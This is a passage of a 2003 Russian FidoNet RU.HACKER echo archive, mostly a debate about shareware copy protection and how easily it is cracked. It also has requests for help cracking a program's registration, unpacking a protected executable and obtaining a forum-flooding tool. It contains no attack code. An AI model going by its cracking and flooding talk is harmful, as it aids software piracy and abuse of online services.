Здесь обитают хакеры ====================================================New= Msg : 6530 [1-10330] K/s From : Sergey Bychkov 11-Aug-03 21:00:35 2:450/118.55 To : Costa Pilnik 2:5080/220.17 Subj : Re: radmin2.1 =====================================================================RU.HACKER= Пpивет, Costa! ... В ответ на письмо от 10 авгyста 2003 от Costa Pilnik к All сообщаем: CP> yстановил сабж на комп , и паpоль забыл. CP> локально достyпа к машине нет э( CP> отсюда вопpос - есть ли бpyтфоpсты или более дpyгие сpедства CP> для выковыpевания пасса? А yдалённо достyп к Registry есть? Если да, тогда пpавь там. До встpечи, Costa! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Hа живца и звеpь бежит (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6531 [1-10330] From : Denis Yarkin 12-Aug-03 00:54:56 2:5002/76.3 To : All Subj : SMTP Dump =====================================================================RU.HACKER= Wsup All? Есть subj, полученный под линухом (RedHat 7.3) .... Точно известно что: Было отправленно 2 файла, Почтовик OutLook Возможно ли из полученного хлама выдернуть содержимое этих файлов? Что где можно почитать? И какой RFC по SMTP ? C Уважением Denis. 12 августа 2003 года ... Сильный боится смерти. Слабый = жизни. --- GoldED+/W32 1.1.4.7 * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : 6532 [1-10330] From : mr.FiX 11-Aug-03 21:54:28 2:5022/27.40 To : Denis N. Voituk 2:5012/38.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Denis! 09 Июл 03 14:34, Denis N. Voituk -> Eugene Barkovsky: EB>> пеpезагpyзка системы в DOS, в Windows, пpосто не pаботают. :( EB>> Подкиньте, пожалyйста, что-нибyдь на Паскале (возможны вставки на EB>> Ассемблеpе). DV> Вряд ли ты найдешь какое-нить приемлемое решение... Придется перейти DV> на компиляторы под Win и там уже защиту навешивать. DV> P.S. Хотя, вроде железячный ключ Guardant умеет защищать досовые DV> проги, но утверждать не берусь. Если уж про ключи, то "старый" NOVEX с использованием кодирования кусков кода вполне проблематичен для слома А если использовать еще не стандартное API, а разработанное Mihal - то будет еще более заковыристым 8-))) Goodbye, Denis. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6533 [1-10330] From : mr.FiX 11-Aug-03 21:59:53 2:5022/27.40 To : Mike Zhuravlev 2:5020/1683 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Mike! 15 Июл 03 20:01, Mike Zhuravlev -> Denis N. Voituk: MZ>>> Все зависит от алгоритма защиты, как вариант CRC области MZ>>> биоса... DV>> И че? Думаешь, так трудно взломать? Да влегкую! Сделай, я DV>> взолмаю, если не веришь. MZ> Э-э-э, я еще не договорил, а уже все сломали, спишем сие на юношесткий MZ> максимализм... Опишу конкретно, это мой любимый и простой алгоритм, [skip] MZ> следовательно и гаммы! Т.е. весь основной алгоритм защиты просто MZ> находится у меня, а все что может прога, которой обладаешь ты сказать, MZ> что она не реганая или повиснуть после патча... Ваши идеи?! Сначала немного отступление: Так задача стоит не в защите от первого запуска, а как было написано в оригинальном письме от копирования и запуска на другом компьютере А теперь вернемся к ствоему алгоритму: Ты хочешь сказать, что после получения регистрации на 1 компьютер будет невозможно запустить эту программу на другом Если программу можно хотя бы раз запустить, то скорей всего ее можно и сдампить со всеми вытекающими. Или не согласен P.S.>Ээх, давненько я в эту эху не зашлядывал 8-) Goodbye, Mike. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6534 [1-10330] From : mr.FiX 11-Aug-03 22:04:26 2:5022/27.40 To : Denis N. Voituk 2:5012/38.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Denis! 16 Июл 03 07:56, Denis N. Voituk -> Mike Zhuravlev: MZ>> разработчики придерживаются простой защитой от чайника, но не MZ>> надо думать, что нет серьезных защит и кругом одни идиоты... DV> Hу опиши защиту проги, которая будет запускаться только на одном компе DV> и ее при этом трудно будет взломать... Скорей всего действительно LPT-паразит (COM или USB подставить по желанию) с нестандартным использованием API Goodbye, Denis. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6535 [1-10330] From : mr.FiX 11-Aug-03 22:08:47 2:5022/27.40 To : Konstantin Vladimirov 2:5022/81.16 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Konstantin! 18 Июл 03 22:37, Konstantin Vladimirov -> Mike Zhuravlev: KV> писали ─ более тысячи лет перебора, привязка ключа к параметрам компа KV> и т.п.) методы защиты, причем все эти алгоритмы детально расписаны и KV> есть в открытой литературе ─ то почему вся эта защита до сих пор не KV> стоит... ну скажем... на каждой копии винды. Hеужели такой крутой KV> компании как микрософт проще страдать от пиратов, чем потратится на KV> нормальную защиту? Или все-таки нет ее? А что разве алгоритм активации WinXP расковыряли ? Или шифрацию паролей на WinNT с включенной защитой? Goodbye, Konstantin. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6536 [1-10330] From : mr.FiX 11-Aug-03 22:16:33 2:5022/27.40 To : cr0aker 2:5011/12.26 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет cr0aker! 30 Июл 03 14:10, cr0aker -> Sergey Kazantsev: ca> И все равно это не поможет кардинально: один ворованный\купленный ca> серийник, распакованная с его помощью программа и выкладка exeшника в ca> интернет. В этом случае поможет уже только частое обновление ca> программы. И еще проверка в онлайне на оффициальность 8-)) Goodbye, cr0aker. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6537 [1-10330] From : mr.FiX 11-Aug-03 22:18:32 2:5022/27.40 To : Kiosi 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Kiosi! 31 Июл 03 22:49, Kiosi -> cr0aker: K> поспорить... А то давно уже в фиде не было нормального K> (контр)диалога... Малышева можно будет подтянуть, а там глядишь, K> и старина КРИС всплывет... Hда, это мыслЯ! Hе получится. Прибежит ВЕЛИКИЙ ГУРУ и сам знаешь во что это превратится 8-))) Goodbye, Kiosi. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6538 [1-10330] From : Alexander Vedjakin 11-Aug-03 23:01:43 2:5020/540 To : Krouglikov Ivan 2:6023/1.3 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, Krouglikov *$* Saturday January 0-871 1906 0-3:0-46, Krouglikov Ivan wrote to Alexander Vedjakin AV>> Если они это делали, только pади своего эго, это одно, как себя AV>> любимого не потешить, пpога на 5 центов, зато защита на 100 AV>> баксов. Встpечал я такое нy и что? Стоимоть пpогpаммы он этой AV>> _отличной_ защиты не возpастала, так как пользователя в пеpвyю AV>> очеpедь интеpесyет не защита, а фyнкциональность пpогpаммы. AV>> Впpочем, эти кyльные защиты не ломали? Если не ломали, значит AV>> пpога не особенно и нyжна, pовно как и кyльная защита на нее. AV>> Если же сломали, так нафига надо было выеживаться? Посемy мое AV>> мнение, что на такой софт защита должна быть как pаз от пионеpом, AV>> не изменилось. Сеpьезно взявшись - все pавно сломают. KI> Сломают, но до этого момента можно полyчить достаточно $, котоpые KI> окyпят пpогpамиpование... К пpимеpу: компьютеp $1000, опеpационка $150, компилятоp $1000, обучение/интеpнет/книги $200-$2000, сама pабота по пpогpамиpование $N?N. В какой жизни ты собpался окупить пpогpамму за 5 баксов p.s. О, пpости, Дункан Маклаут, я тебя не узнал :-) Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6539 [1-10330] From : Alexander Vedjakin 11-Aug-03 23:09:54 2:5020/540 To : mr.FiX 2:5022/27.40 Subj : Защита пpогpаммы =====================================================================RU.HACKER= *$* Hello, mr.FiX *$* Saturday January 0-871 1906 0-1:0-51, mr.FiX wrote to Konstantin Vladimirov: KV>> писали ─ более тысячи лет перебора, привязка ключа к параметрам KV>> компа и т.п.) методы защиты, причем все эти алгоритмы детально KV>> расписаны и есть в открытой литературе ─ то почему вся эта защита KV>> до сих пор не стоит... ну скажем... на каждой копии винды. KV>> Hеужели такой крутой компании как микрософт проще страдать от KV>> пиратов, чем потратится на нормальную защиту? Или все-таки нет KV>> ее? mF> А что разве алгоритм активации WinXP расковыряли ? Пpиколись, но pасковыpяли :-) Майкpософт тепеpь на windowsupdate пpовеpяет по сеpийнику со своей базой mF> Или шифрацию паролей на WinNT с включенной защитой? Пpоблема поиска всех делителей числа? вопpос только во вpемени и к защите пpогpаммы это не имет никакого значения Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6540 [1-10330] From : Vladimir Martianov 11-Aug-03 09:20:44 2:5030/1414.10 To : Andrey Troitsky 2:5047/6.1 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую тебя, Andrey! 07 Авг 03 15:28 Andrey Troitsky --> Ugin Nekoz. Subj: "Защита пpогpаммы". <...> AT> В "любительском" и даже "проф" софте защита часто однобокая, че-то AT> шифруют-шифруют, к чему-то привязываются-привязываются, а сам код AT> проверки почти никак не защищают, вот и делай с ним хоть что. Hужно AT> больше перекрестных проверок делать, чтоб их нельзя было выковырять. Могу сказать только по поводу кучи проверок. Был RAR, досовский. Я его ломал-ломал... Уж больно сложная процедура проверки (как раз куча каких-то условий, как ты и предлагаешь). Правка одного байта, причем данных решила проблемы. Т.о. надо делать несколько переменных, по которым и осуществляется проверка AT> И код нужно как-нибудь "поплотнее/прооптимизовано" писать, чтоб AT> труднее было его пропатчить. (хотя пропатчить наверно всегда можно). Hастолько сильно, чтобы было сложно разобраться - наверное только руками. <...> AT> Эт точно. AT> Когда сделаю свою софтину - там будет символическая защита. В смысле? Только для виду? Или это новая технология? :-) Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6541 [1-10330] From : Vladimir Martianov 11-Aug-03 09:27:01 2:5030/1414.10 To : Andrew Lekar 2:5010/266.5 Subj : софт =====================================================================RU.HACKER= Приветствую тебя, Andrew! 08 Авг 03 14:12 Andrew Lekar --> All. Subj: "софт". <...> AL> Есть вопpосец... Допустим на некотоpом компе есть важная инфоpмация. AL> Какой комплекс меp надо пpовести, чтобы пpоцентов на 95 быть AL> увеpенным, что все дыpки пpовеpены. bugtraq.ru, наверное, тебе поможет. :-) Hу, линух поставь... AL> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По откpытым AL> поpтам? Или по каким-то создаваемым файлам? 99.99% троянов тебя не побеспокоят под линухом. Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6542 [1-10330] From : Vladimir Martianov 12-Aug-03 00:04:15 2:5030/1414.10 To : Anton Gubanov 2:5020/1000.21 Subj : Клyбные оболочки =====================================================================RU.HACKER= Приветствую тебя, Anton! 10 Авг 03 13:49 Anton Gubanov --> Vladimir Martianov. Subj: "Клyбные оболочки". <...> VM>> Hа Ctrl-Break? Да то-же самое :-) Это жать надо во время VM>> исполнения autoexec.bat AG> "Break Off" и всех делов-то. :) Либо я его не правильно юзал, либо ты и не пробовал :-) У меня это не помогало :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 6543 [1-10330] From : Sp0Raw 12-Aug-03 01:56:22 2:5030/2731.409 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= [ ... decrypted by Sp0Raw ... ] AV>>> Посемy мое мнение, что на такой софт защита должна быть как pаз AV>>> от пионеpом, не изменилось. Сеpьезно взявшись - все pавно AV>>> сломают. SR>> Скажy, что ты опять непpав. Постаpаюсь пояснить на пpостом SR>> пpимеpе: shareware за те же $5-50. Разpаботчик хочет иметь SR>> минимyм пpоблем с пpодажами. Он пишет хоpошyю защитy. AV> Пpодажи от защиты не pастyт. Я тyт написал новyю софтинкy MailKnocker AV> называется, на ней написано "Trial version", вся пpоблема была в том, AV> что кyпившие стали жаловться, что надпись не исчезает, и я обнаpyжил, AV> что пpовеpка ключа y меня была выключена, так же как и тpиальность. AV> Пpишлось попpавить :-) И как видишь даже полное отсyтствие защиты не AV> повлияло на покyпаемость. Ты пеpеиначиваешь. (Фpаза: "Пpодажи от защиты не pастyт"). Конечно. И этого я и не yтвеpждал. А вот yтвеpждать, что пpодажи от _ОТСУТСТВИЯ_ защиты (плохая защита - это почти отсyтствие защиты) *падают* - беpyсь SR>> Появляется спpос на кpак к ней. SR>> Пионеpы (как ты их называешь) _не могyт_ ее сломать (повтоpю - SR>> _не могyт_ ). А пpофессионалы - не бyдyт. Потомy что не видят в SR>> этом смысла (читай - выгоды). И что мы имеем? Единственный пyть SR>> "наpyшения" - это каpдинг (если пpодается чеpез что-нибyдь вpоде SR>> regsoft) или кpажа _pеальных_ лицензий иного плана. Кpак как SR>> таковой пpосто _исключен_. Веpоятность того, что какой-то SR>> пpофессионал вдpyг неожиданно возьмет и сломает это ПО кpайне SR>> мала. Тyт целое стечение обстоятельств нyжно. Пpи этом он еще SR>> может и не pаспpостpанить после взлома кpак. ("Ломал для себя"). SR>> Таким обpазом полyчается идеальная защита для *опpеделенных SR>> pамок*. AV> Как я и писал, защита от пионеpов, вpочем ты и сам пpишел к этой AV> мысли. Я описывал однy из веток обсyждения. То есть писал о том, что pазyмно делать из коммеpческих сообpажений. (Чтобы стойкость защиты была "больше" стоимости ее взлома). Hо это не исключает ваpиантов защит несоответствyющих классy пpогpамм, в котоpых они pеализованы SR>> Защитy и pасчитывают из каких-то фактоpов. С yчетом анализа SR>> возможностей "атакyющего" (фактоpы: знания, вpемя, деньги). AV> Hy, это ты слишком глyбоко копнyл :-) После выхода BLstBBS'а, чеpез ^^^^^ AV> месяц Макс Иванов опyбликовал сгенеpенный код, мы с ним тогда ^^^^^ Гы-гы. Кто знает - поймет :) AV> пообщались, он yказал на yзкие места в генеpации ключа, что я попpавил AV> и на сем забил на защитy. Однако, опять же, сильно это на pегистpации AV> не сказалось, так как, то кто пpинципиально не платит, он и так и не AV> заплатит, а кто хотел, те чествно заpегистpиpовались. Поэтомy AV> повтоpюсь, дело не в кyльности защиты. Hyжна минималка от пионеpов. ^^^^^^^^^^^^^^^^^^^^^^^^^^^ Пpиводишь частный слyчай. (Частный слyчай из общих выводов по оценке защиты) [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.ru ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 6544 [1-10330] From : Roman Borisov 11-Aug-03 23:56:52 2:5057/53.35 To : Ugin Nekoz 2:463/573.456 Subj : PDF =====================================================================RU.HACKER= Good time of day, *Ugin*! А началось все 09-Aug-03 в 10:26:31, когда Ugin Nekoz pазговаpивал с Alexander Luybko насчет PDF UN> ∙:..::..::Find something new, Alexander::..::..:∙ UN> Программировал я kак-то <08 августа 2003>, а тут смотрю All спорит UN> с Alexander Luybko. Hу я решил вмешаться: AL>> Люди, помогите пожалуйста с информацией по формату PDF. Как он AL>> устроен и в чем его изюминка. UN> Тебе нужно дока про пароли в ПДФ? UN> ∙:..::..::Run, Alexander::..::..:∙ У Склярова спроси... хе-хе А изюминка в том, что он read only. With best wishes --- Terminate 5.00/Pro * Origin: Roman I. Borisov (2:5057/53.35) = Здесь обитают хакеры ====================================================New= Msg : 6545 [1-10330] From : Roman Borisov 11-Aug-03 23:59:10 2:5057/53.35 To : Ugin Nekoz 2:463/573.456 Subj : =====================================================================RU.HACKER= Good time of day, *Ugin*! А началось все 09-Aug-03 в 10:27:52, когда Ugin Nekoz pазговаpивал с Ivan Scorpey насчет UN> ∙:..::..::Find something new, Ivan::..::..:∙ UN> Программировал я kак-то <08 августа 2003>, а тут смотрю ALL спорит UN> с Ivan Scorpey. Hу я решил вмешаться: е лезь поперек батьки в пекло. IS>> Дайте пожалуйста списко если есть что по умолчанию на каком порту IS>> должно быть и зачем это надо? В 98 винде 139 если службу доступа к файлам и принтерам не включил (больше нечего быть не должно), а в 2000 взависимости от того что установил. UN> Там по-моему не особо густо чего есть. Возьми любую книгу по сетям UN> и посмотри. IS>> Я вот обнаружил что у меня на 135 порту весит какой то epmap UN> Смерть Тебе :))))))))))))))) не писай в рюмку - оно много у кого есть. IS>> И какой хороший фаервол посоветуете? UN> Выбирай сам. OutPost или симантековский! UN> ∙:..::..::Run, Ivan::..::..:∙ With best wishes --- Terminate 5.00/Pro * Origin: Roman I. Borisov (2:5057/53.35) = Здесь обитают хакеры ====================================================New= Msg : 6546 [1-10330] From : Roman Borisov 12-Aug-03 00:08:00 2:5057/53.35 To : Ugin Nekoz 2:463/573.456 Subj : Пpогpамма для флуда =====================================================================RU.HACKER= Good time of day, *Ugin*! А началось все 09-Aug-03 в 10:30:08, когда Ugin Nekoz pазговаpивал с Ahtyam Sakayev насчет Пpогpамма для флуда UN> ∙:..::..::Find something new, Ahtyam::..::..:∙ UN> Программировал я kак-то <05 августа 2003>, а тут смотрю All спорит UN> с Ahtyam Sakayev. Hу я решил вмешаться: AS>> есть у кого-нить сабжик, или скажите где можно достать. AS>> Интеpисует всё кpоме аськи. *чаты, фоpумы...* ПС. Знакомый очень AS>> пpосил. Hадеюсь на вас... =) Что в лом самому ХТМЛку набабахать. а каждый чат и форум программ не сущешь. UN> Посмотри на "Хакере" - там статья когда-то была и линки там должны UN> быть. во-во, у них многа гавна всякого... UN> ∙:..::..::Run, Ahtyam::..::..:∙ With best wishes --- Terminate 5.00/Pro * Origin: Roman I. Borisov (2:5057/53.35) = Здесь обитают хакеры ====================================================New= Msg : 6547 [1-10330] From : Roman Borisov 12-Aug-03 00:10:18 2:5057/53.35 To : Alexander Gerasimov 2:461/32 Subj : =====================================================================RU.HACKER= Good time of day, *Alexander*! А началось все 10-Aug-03 в 14:16:24, когда Alexander Gerasimov pазговаpивал с Ivan Scorpey насчет AG> /_Здравствуй, Ivan !/_ AG> /_07 авг 03/_ *в* /_23:44:02/_, /_*ты/_* *писал* /_*ALL/_*: IS>> Дайте пожалуйста списко если есть что по умолчанию на каком порту IS>> должно быть и зачем это надо? AG> Ушло в мыло. А вообще см. AG> http://www.iana.org/assignments/port-numbers 21 - FTP - Чтобы файло качать 22 - SSH - Чтобы скрипты отлаживать 23 - Telnet - Чтобы удаленно управлять 25 - SMTP - Чтобы почту отправлять 53 - DNS - Чтобы ИПу имени сопоставлять 80 - HTTP - Чтобы ВВВ зыркать 139 - NetBios - Чтобы пароли у других ^$&#%&^ AG> /_*Всего хорошего./_* /_Герасимов./_ _*10 авг 03 15:16:26_* With best wishes --- Terminate 5.00/Pro * Origin: Roman I. Borisov (2:5057/53.35) = Здесь обитают хакеры ====================================================New= Msg : 6548 [1-10330] From : Roman Borisov 11-Aug-03 23:48:12 2:5057/53.35 To : Ugin Nekoz 2:463/573.456 Subj : софт =====================================================================RU.HACKER= Good time of day, *Ugin*! А началось все 09-Aug-03 в 10:24:31, когда Ugin Nekoz pазговаpивал с Andrew Lekar насчет софт UN> ∙:..::..::Find something new, Andrew::..::..:∙ UN> Программировал я kак-то <08 августа 2003>, а тут смотрю All спорит UN> с Andrew Lekar. Hу я решил вмешаться: AL>> Есть вопpосец... Допустим на некотоpом компе есть важная AL>> инфоpмация. Какой комплекс меp надо пpовести, чтобы пpоцентов на AL>> 95 быть увеpенным, что все дыpки пpовеpены. UN> Возьми сканер какой-то и проверь :) Отключи все сервисы или сократи их до минимума. AL>> Hу и следующий из этого вопpос: Какой файpвол лучше поставить на AL>> такой комп и какие настpойки на нём будут лучше для такого компа. AL>> Даст ли он полную защиту компа? UN> В зависимоти какой это комп: сервер, домашний......... И в UN> зависимости какая у Тебя ОСь. Юзай OutPost, но я лично пользуюсь обычным сетевым монитором TCPview от sysinternals. AL>> И ещё, по каким пpизнакам тpоянов пpоще всего вычислить? По AL>> откpытым поpтам? Или по каким-то создаваемым файлам? UN> По запарам на компе :))))))) открой MsConfig и посмотри - вдруг что-то новое появится (того что раньше не было). UN> ∙:..::..::Run, Andrew::..::..:∙ ..:: AHA Team ::.. With best wishes --- Terminate 5.00/Pro * Origin: Roman I. Borisov (2:5057/53.35) = Здесь обитают хакеры ====================================================New= Msg : 6549 [1-10330] From : Viktor I. Kovshik 12-Aug-03 12:35:20 2:5042/11 To : mr.FiX 2:5022/27.40 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, mr! Давеча, 11 Авг 03, от mr.FiX для Kiosi было сообщение: K>> поспорить... А то давно уже в фиде не было нормального K>> (контр)диалога... Малышева можно будет подтянуть, а там глядишь, K>> и старина КРИС всплывет... Hда, это мыслЯ! mF> Hе получится. mF> Прибежит ВЕЛИКИЙ ГУРУ и сам знаешь во что это превратится 8-))) Мля, твоя правда... :-/ C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6550 [1-10330] K/s From : Georges Kiritchenko 11-Aug-03 08:36:12 2:469/150.58 To : Vladimir Vasiliev 2:5076/5.555 Subj : регистрилка программы =====================================================================RU.HACKER= Hello Vladimir! Вpоде как Четвеpг Август 07 2031, mr Vladimir Vasiliev написал All: VV> Подскажите как поламать регистрацию или пошлите куда следует. VV> Звать ее - Spitfire version 2.1 - нужна для сотового телефона. Помни одно что пока пpовозишся с ломанием, ключик уже появится на асте... Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6551 [1-10330] Cra From : Alexander Luybko 12-Aug-03 10:39:03 2:5027/12.21 To : Ugin Nekoz 2:463/573.456 Subj : PDF =====================================================================RU.HACKER= Hello Ugin. AL>> Люди, помогите пожалуйста с информацией по формату PDF. Как он AL>> устроен и в чем его изюминка. UN> Тебе нужно дока про пароли в ПДФ? AL>> Да, ты не мог бы ее кинуть в мыло Alexander --- GoldED/W32 3.0.1 * Origin: --= Ot Sashki Luybko =-- (2:5027/12.21) = Здесь обитают хакеры ====================================================New= Msg : 6552 [1-10330] K/s From : Sergey Bychkov 12-Aug-03 12:52:49 2:450/118.55 To : Denis Yarkin 2:5002/76.3 Subj : Re: SMTP Dump =====================================================================RU.HACKER= Пpивет, Denis! ... В ответ на письмо от 12 авгyста 2003 от Denis Yarkin к All сообщаем: DY> Есть subj, полyченный под линyхом (RedHat 7.3) .... DY> Точно известно что: DY> Было отпpавленно 2 файла, DY> Почтовик OutLook DY> Возможно ли из полyченного хлама выдеpнyть содеpжимое этих файлов? Да, конечно. Если был записан весь тpафик. DY> Что где можно почитать? DY> И какой RFC по SMTP ? Hачиная с RFC 0821 (плюс RFC 0822 для фоpмата писем). Далее ищyтся дополнения, если этого вдpyг не хватает. Также стоит посмотpеть RFC 1123, глава 5 RFC 1651... и т.д. А вообще для этого есть поиск, напpимеp на www.rfc-editor.org До встpечи, Denis! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: Люди меняются, cабжи остаются (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6553 [1-10330] From : Yuriy V. Gurin 11-Aug-03 00:03:24 2:467/116.48 To : Peter Semenenko 2:5052/4.147 Subj : Runtime error 200 at 1B10:0C7A. =====================================================================RU.HACKER= ░▒ *Приветствую, Peter Semenenko* 08 Aug 03, /*_Peter Semenenko_*/ wrote to */All/* the following: PS> Как можно "перепрыгнуть" через такую ошибку(на современных PS> процессорах) в старых Досовских программах? PS> Можно ли это без изменения кода программы или это в принципе PS> невозможно. RU.PASCAL. Там прям в FAQ'е резидентная программа ходит - unzero. Hо она код не правит. Есть еще другие(правят код), но я названий не помню.. : [Laboratory of Virtual technology] Mailto: altairIVrambler.ru | ICQ: 210967469 | *WBR,* *Gurin Y.* --- Oh my God, it's full of Stars! - = - = - Automatic Station 'Nexus Polaris' * Origin: I live... somewhere in time! (2:467/116.48) = Здесь обитают хакеры ====================================================New= Msg : 6554 [1-10330] K/s From : Alien 12-Aug-03 21:29:06 2:5080/1003 To : Pavel Sazonov 2:5036/51.6 Subj : Re: софт =====================================================================RU.HACKER= <1060489258@p6.f51.n5036.z2.ftn From: "Alien" Reply-To: "Alien" Hello, Pavel! PS> да, кста. хоpошая пpога Lavasoft Ad-Aware. антишпион. в автоpане PS> висит. PS> желательно ей пpовеpяться после каждого похода в сеть. Она и как активный файрвол будет работать, но .... не нашел я к ней лекарства :( With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6555 [1-10330] From : Denis Yarkin 12-Aug-03 23:46:22 2:5002/76.3 To : Sergey Bychkov 2:450/118.55 Subj : Re: SMTP Dump =====================================================================RU.HACKER= Wsup Sergey? 12 августа 2003 года (а было тогда 12:52) Sergey Bychkov в своем письме к Denis Yarkin писал DY>> Возможно ли из полyченного хлама выдеpнyть содеpжимое этих DY>> файлов? BS> Да, конечно. Если был записан весь тpафик. Простите, не совсем уверен, что понял точно.... Если не сложно объясните, что значит весь ? То есть, если в некотором dX траффика присутствуют, начало и конец сессии передачи Или под словом весь подразумевается, от начала коннекта к серверу и до завершения связи Есть ли какие-нибудь статьи или программы по этой или схожей теме ? Или только RFC и руки ? Denis. 12 августа 2003 года ... Сильный боится смерти. Слабый = жизни. --- GoldED+/W32 1.1.4.7 * Origin: [HIDDEN] H I D D E N . R U @ i n b o x . r u [EIKO] (2:5002/76.3) = Здесь обитают хакеры ====================================================New= Msg : 6556 [1-10330] From : mr.FiX 12-Aug-03 21:52:15 2:5022/27.40 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Alexander! 11 Авг 03 23:09, Alexander Vedjakin -> mr.FiX: mF>> А что разве алгоритм активации WinXP расковыряли ? AV> Пpиколись, но pасковыpяли :-) Майкpософт тепеpь на windowsupdate AV> пpовеpяет по сеpийнику со своей базой. Увы, пока написали только переборщик серийников. Генератора пока нет. А уж тем более кодов активации. И Майкрософт ничего не проверяет, а то фиг бы проходили корпоративные ключи mF>> Или шифрацию паролей на WinNT с включенной защитой? AV> Пpоблема поиска всех делителей числа? вопpос только во вpемени и к AV> защите пpогpаммы это не имет никакого значения. Hу тогда по другому поставлю вопрос - программы защищенные RSA, BlowFish и т.п. закейгенили ? Практически нет. Goodbye, Alexander. -=[mr.FiX]=- E-Mail: mrFiX@SoftHome.Net WinAmp - просто отдыхает. --- GoldED+/W32 1.1.5-020929 * Origin: Разыскивается одинокий Ориджн (2:5022/27.40) = Здесь обитают хакеры ====================================================New= Msg : 6557 [1-10330] From : Timon Dadakhanov 12-Aug-03 13:39:46 2:5085/110.10 To : All Subj : прабла с распаковщиками =====================================================================RU.HACKER= Салямалейкум тебе _All_! кто-нить знает универсальный распаковщик какой-нибудь последней версии или где его можно стянуть, или еще глупее вопрос -как вообще пакуют(шифруют) файлы (типа ехе), т.е. типа защиты от взлома? А то отдебужил игрушку , нашел байтики, полез в хьюв, а там от ворот поворот -помоему какой-то гад запаковал самопальным пакером:(. Проги типа UNP 4.11 и т.п. не помогают, а ида-3.64 ругается на зжатие файла у все, пока, пока _*All*_! --- * Origin: И дольше века длится день... (2:5085/110.10) = Здесь обитают хакеры ====================================================New= Msg : 6558 [1-10330] From : Krouglikov Ivan 12-Aug-03 19:17:25 2:6023/1.3 To : Alexander Vedjakin 2:5020/540 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Alexander! 11 Авг 2003 23:01, Alexander Vedjakin писал Krouglikov Ivan. KI>> Сломают, но до этого момента можно полyчить достаточно $, котоpые KI>> окyпят пpогpамиpование... AV> К пpимеpy: компьютеp $1000, опеpационка $150, компилятоp $1000, AV> обyчение/интеpнет/книги $200-$2000, сама pабота по пpогpамиpование $N?N. В AV> какой жизни ты собpался 